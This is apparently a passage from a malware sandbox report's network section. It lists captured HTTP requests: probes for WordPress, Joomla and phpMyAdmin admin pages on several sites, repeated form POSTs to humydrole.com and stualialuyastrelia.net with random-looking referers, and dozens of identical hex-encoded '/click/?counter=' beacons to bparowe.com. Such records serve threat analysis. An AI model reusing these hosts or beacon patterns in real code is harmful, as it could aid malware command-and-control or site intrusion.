                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://brightright.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://keramat.sk/administrator/
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jeykdtwfgybrmka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqeynfegrlvxptk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhsemqpgtljiqh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dglifrlqooic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaadevesuhql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnxrixcpqaqlfxho.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vuhmtmvivujqrlex.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://huwaudbeqfsonfq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://peydgftdqchd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpxbmpqrkuspwng.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geonycqvjjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjrmxalykns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcglxqfkrbwarw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: humydrole.com
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e2f834798823d2b6c47a7377425879a663bdccd82385b558fd807fa10cadd5a HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qwylvowtnlb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mioaiveaskiatypa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
